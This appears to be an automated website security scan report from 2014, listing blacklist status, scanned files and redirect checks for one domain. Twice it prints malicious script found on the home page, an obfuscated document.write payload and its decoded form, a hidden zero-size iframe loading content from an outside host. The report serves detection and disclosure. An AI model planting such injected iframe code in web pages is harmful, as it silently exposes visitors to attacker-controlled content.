Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tits.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://tits.com/ | 200 OK Content-Length: 6285 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%7A%67%33%6F%77%6A%6A%6E%7A%71%77%6E%2E%67%68%61%72%61%2E%70%77%3A%31%32%31%30%31%2F%68%61%73%68%2F%76%63%6F%6D%69%63%73%2E%70%68%70%3F%73%63%61%6E%6E%65%72%73%3D%31%32%37%22%20%68%65%69%67%68%74%3D%30%20%77%69%64%74%68%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E')); Decoded script: <iframe src="http://zg3owjjnzqwn.ghara.pw:12101/hash/vcomics.php?scanners=127" height=0 width=0></iframe> Antivirus reports:
| ||
http://tits.com/tits_files/custom.js | 200 OK Content-Length: 9288 Content-Type: application/x-javascript | clean |
http://tits.com/tits_files/zepto.js | 200 OK Content-Length: 66019 Content-Type: application/x-javascript | clean |
http://tits.com/tits_files/foundation.js | 200 OK Content-Length: 60680 Content-Type: application/x-javascript | clean |
http://tits.com/tits_files/libs/jquery/jquery.js | 200 OK Content-Length: 266056 Content-Type: application/x-javascript | clean |
http://tits.com/tits_files/src/jquery.backstretch.js | 200 OK Content-Length: 11775 Content-Type: application/x-javascript | clean |
http://tits.com/test404page.js | HTTP/1.1 302 Redirect Date: Tue, 29 Apr 2014 12:57:48 GMT Location: http://www.tits.com/ Server: Microsoft-IIS/7.5 Content-Length: 143 Content-Type: text/html; charset=UTF-8 X-Powered-By: ASP.NET | clean |
http://www.tits.com/ | 200 OK Content-Length: 6285 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%7A%67%33%6F%77%6A%6A%6E%7A%71%77%6E%2E%67%68%61%72%61%2E%70%77%3A%31%32%31%30%31%2F%68%61%73%68%2F%76%63%6F%6D%69%63%73%2E%70%68%70%3F%73%63%61%6E%6E%65%72%73%3D%31%32%37%22%20%68%65%69%67%68%74%3D%30%20%77%69%64%74%68%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E')); Decoded script: <iframe src="http://zg3owjjnzqwn.ghara.pw:12101/hash/vcomics.php?scanners=127" height=0 width=0></iframe> Antivirus reports:
| ||
http://www.tits.com/tits_files/custom.js | 200 OK Content-Length: 9288 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tits.com
Result:
HTTP/1.1 200 OK
Date: Tue, 29 Apr 2014 12:57:43 GMT
Server: Microsoft-IIS/7.5
Content-Type: text/html; charset=UTF-8
X-Powered-By: ASP.NET
GET / HTTP/1.1
Host: tits.com
Result:
HTTP/1.1 200 OK
Date: Tue, 29 Apr 2014 12:57:43 GMT
Server: Microsoft-IIS/7.5
Content-Type: text/html; charset=UTF-8
X-Powered-By: ASP.NET
Second query (visit from search engine):
GET / HTTP/1.1
Host: tits.com
Referer: http://www.google.com/search?q=tits.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: tits.com
Referer: http://www.google.com/search?q=tits.com
Result:
The result is similar to the first query. There are no suspicious redirects found.